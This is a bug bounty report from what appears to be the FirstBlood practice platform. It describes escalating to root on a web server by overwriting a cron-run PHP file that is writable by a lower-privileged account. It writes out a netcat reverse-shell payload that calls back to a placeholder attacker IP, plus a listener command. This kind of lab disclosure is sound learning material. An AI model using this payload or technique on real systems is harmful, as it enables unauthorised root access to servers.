FirstBlood-#681 — Root access on the web server
This issue was discovered on FirstBlood v2
On 2021-10-27, shivam18u Level 3 reported:
Hi sean,
I found a way to get root access of the server.
I have mentioned the steps to get RCE with fb-exec account access. With that access we can further get root access.
https://www.bugbountyhunter.com/hackevents/report?id=633
After getting the fb-exec access, you can see the /app/docker/crontab
file.
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635334579/r9pvsorbid6ixtvb7vhs.png)
The crontab runs the scheduler.php file with root access every minute.
So, if we edit the scheduler.php file, we can get reverse shell to our vps.
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635334578/sdy9cxqbilclcipibaf7.png)
We can echo the php code with system function to run the required command in scheduler.php.
echo '<?php system("nc IP ADDRESS -e /bin/sh");?>' > scheduler.php
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635335086/uwjt16wudon5hrssw2gv.png)
After editing the file, start a listener on your vps.
nc -nvlp 7070
You will get a connection within a minute. You can check the user.
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635335142/n7ejix6biogekleghzzb.png)
Have a nice day!!
P1 CRITICAL
Endpoint: .
Parameter: .
Payload: .
FirstBlood ID: 35
Vulnerability Type: RCE
A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.